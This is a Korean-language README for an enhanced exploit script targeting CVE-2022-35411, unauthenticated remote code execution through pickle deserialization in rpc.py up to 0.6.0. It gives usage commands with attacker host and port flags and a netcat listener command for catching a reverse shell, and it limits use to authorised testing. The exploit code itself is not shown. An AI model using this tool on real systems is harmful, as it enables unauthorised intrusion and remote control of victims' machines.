
CVE-2022-35411 익스플로잇 — rpc.py (<= 0.6.0)에서의 인증되지 않은 RCE
이는 CVE-2022-35411을 대상으로 하는 업데이트되고 개선된 익스플로잇으로, 취약한 버전의 rpc.py (<= 0.6.0)를 공격합니다.
Python pickle 역직렬화를 통해 **인증되지 않은 원격 코드 실행(RCE)**을 가능하게 합니다.
원본 익스플로잇 작성자: Elias Hohl
향상된 버전: x7331 - 사용성, 이식성 및 자동화 개선
취약점은 rpc.py가 Python의 pickle 모듈을 안전하지 않게 사용하는 데 있으며, 조작된 페이로드가 인증 없이 임의 명령을 실행할 수 있도록 합니다.
v0.4.2 – v0.6.0argparse로 전환하여 --lhost, --lport, --target, --dry-run 플래그 지원-h / --help를 통한 적절한 사용법 안내python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi
3.xrequests 라이브러리 (pip install requests로 설치)nc -lvnp 9001)이 익스플로잇은 교육 및 승인된 테스트 목적으로만 제공됩니다. 소유하지 않거나 명시적 테스트 허가가 없는 시스템에서는 사용하지 마십시오.